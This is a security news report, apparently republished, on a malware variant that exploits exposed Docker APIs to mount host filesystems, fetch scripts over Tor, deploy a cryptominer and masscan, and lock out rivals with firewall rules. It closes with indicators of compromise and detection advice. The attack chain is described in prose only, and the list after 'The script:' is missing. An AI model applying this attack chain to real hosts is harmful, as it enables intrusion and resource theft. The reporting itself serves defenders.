Initially reported in June 2025 by Trend Micro’s Threat Intelligence Team as a Tor-enabled cryptominer dropper, this variant, observed in Akamai Hunt honeypots in August 2025, expands infection capabilities by leveraging host filesystem mounts, automated firewall lockdowns, and a sophisticated Go-based dropper that orchestrates further propagation.
The initial June 2025 strain exploited open Docker ports (2375) to launch an Alpine: latest container, mount the host root filesystem, and execute a Base64-encoded shell script fetched from a Tor. onion server.
That downloader installed curl and tor, routed purchases through socks5h://localhost:9050, and ultimately deployed an XMRig cryptominer packed in a Zstandard-compressed binary via a second Tor endpoint.
Persistence was achieved by modifying SSH configurations for root login and establishing a cron job for stealthy beaconing.
The Akamai Hunt Team has now identified a variant that diverges significantly. Instead of dropping only a cryptominer, this iteration delivers a multi-tool payload including masscan, libpcap, torsocks, and custom infection capabilities while aggressively denying access by blocking port 2375 at the host level.
Automated firewall rules are inserted via cron to reject incoming TCP traffic on the Docker API port using whichever utility (firewall-cmd, ufw, pfctl, iptables, or nft) is available.
This “superiority” tactic prevents other attackers from leveraging the same host, effectively reserving the compromised instance for the threat actor’s exclusive use.
Upon container creation, the Base64 payload installs prerequisites and fetches docker-init.sh from a Tor address. The script:
The Go dropper parses the utmp file to identify active sessions, executes masscan scans for port 2375, and, upon discovery, initiates the same container-creation exploit on new targets.
While the binary includes unused logic for Telnet (port 23) and Chromium remote debugging (port 9222) infection techniques, these branches remain dormant pending future enhancements.
Indicators of compromise include unusual container deployments with host bind mounts, Base64-encoded commands invoking tor and curl, cron entries for firewall utilities blocking port 2375, and outbound Tor connections to known .onion domains.
Defenders should closely monitor Docker API access on ports 2375, 23, and 9222; flag newly created containers that immediately install curl, tor, or masscan; inspect crontab for repetitive firewall rule deployments; and block unauthorized Tor traffic.
Restricting Docker API exposure, enforcing network segmentation, rotating default credentials, and locking down remote debugging ports are critical to mitigate this advanced infection vector.
Continuous threat hunting platforms like Akamai Hunt can detect these subtle anomalies and thwart lateral propagation before a complex botnet emerges.
| IOC | Type |
|---|---|
| wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion | Domain |
| 2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion | Domain |
| webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207 | URL |
| C38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c – docker-init.sh | Hash |
| 649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 – system | Hash |
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post New Malware Exploits Exposed Docker APIs to Deploy Cryptominer and Hide via Tor appeared first on Cyber Security News.
A bunch of mom-and-pop video game stores have received mysterious shipments of one of the…
I can think of few activities I'd enjoy more than playing a video game on…
Looking for some new board games to play, or maybe a puzzle to piece together…
Sony has announced price increases for its subscription service, PlayStation Plus. PlayStation Plus is Sony’s…
Comic-Con can be a scary place, but what if it became a breeding ground for…
People are betting thousands of dollars on who will die at the end of the…
This website uses cookies.